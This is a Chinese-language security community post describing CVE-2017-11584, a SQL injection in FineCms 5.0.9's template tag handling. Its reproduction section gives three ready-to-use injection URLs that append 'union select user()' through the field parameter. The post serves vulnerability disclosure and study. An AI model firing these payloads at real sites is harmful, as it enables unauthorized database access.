FineCms 5.0.9通过 $system[field]参数进行SQL注入漏洞CVE-2017-11584

漏洞描述

dayrui FineCms 5.0.9通过action=moduleaction=memberaction=form action=related 请求库/Template.php 中的字段参数进行SQL注入漏洞CVE-2017-11584
 


 

漏洞复现

文件/finecms/dayrui/libraries/Template.php函数 list_tag action=relatedaction=formaction=member、参数插入到 sql 查询中,未经任何验证、清理action=module$system['field']

http://finecms.com/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e¶m=action=related%20module=news%20tag=1%20field=1%0aunion%0aselect%0auser()%23

图片[1]-FineCms 5.0.9通过 $system[field]参数进行SQL注入漏洞CVE-2017-11584-孤勇者社区
 

http://finecms.com/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70¶m=action=form%20form=1%20field=1%0aunion%0aselect%0auser()%23

图片[2]-FineCms 5.0.9通过 $system[field]参数进行SQL注入漏洞CVE-2017-11584-孤勇者社区
 

http://finecms.com/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e¶m=action=module%20form=1%20module=news%20field=1%0aunion%0aselect%0auser()%23

图片[3]-FineCms 5.0.9通过 $system[field]参数进行SQL注入漏洞CVE-2017-11584-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像后韩0
    • 头像三后0